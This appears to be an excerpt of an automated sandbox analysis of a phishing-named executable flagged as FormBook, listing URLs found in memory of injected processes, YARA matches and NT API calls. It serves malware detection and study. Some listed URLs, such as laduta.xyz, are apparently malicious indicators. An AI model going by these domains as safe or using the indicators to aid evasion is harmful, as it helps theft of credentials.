                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.salmagundi.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shareyourlove.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shenqizhibo.net/binding
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.simplystudy.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartdna.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.socialanimal.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.souyouzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sportsquest.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taffix.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.weddingangel.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.whatsforlunch.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.womenstrikeus.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xianglizhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xianshangzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiaocangzhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiaocaozhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiaohezhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiapizhibo.com/binding
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xinglianzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xinxiangzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiuchangzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiulizhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yeyuezhi.net
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yingyuezhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yingzhuzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yinrenzhi.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yinxiuzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yueguangzhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yuemanzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yujiezhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yutongzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ziyuzhibo.com
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://companies.rbc.ru/
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000006844000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000003B54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                      Source: oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000003CE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://laduta.xyz/5mxq?T4OdNH=iO94RS5UfBQ5HC
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: Utilman.exe, 00000007.00000003.2483495274.00000000083BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfSB
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.mosorehlable.online&rand=
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: Utilman.exe, 00000007.00000002.4563507919.000000000638E000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.000000000369E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.rbc.ru/technology_and_media/
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.mosorehlable.online&utm_medium=parking&utm_campaign=s_l
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.mosorehlable.online&utm_medium=parking&utm_campaign=s_
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.mosorehlable.online&utm_medium=parking&utm_campaign=s_lan
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                      Source: Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.mosorehlable.online&amp;reg_source=parking_auto
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4560972615.00000000026E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2294192340.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: ORDER REF 47896798 PSMCO.exe
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0042CCC3 NtClose,5_2_0042CCC3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942B60 NtClose,LdrInitializeThunk,5_2_01942B60
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01942DF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01942C70
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019435C0 NtCreateMutant,LdrInitializeThunk,5_2_019435C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01944340 NtSetContextThread,5_2_01944340
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01944650 NtSuspendThread,5_2_01944650
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942B80 NtQueryInformationFile,5_2_01942B80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942BA0 NtEnumerateValueKey,5_2_01942BA0
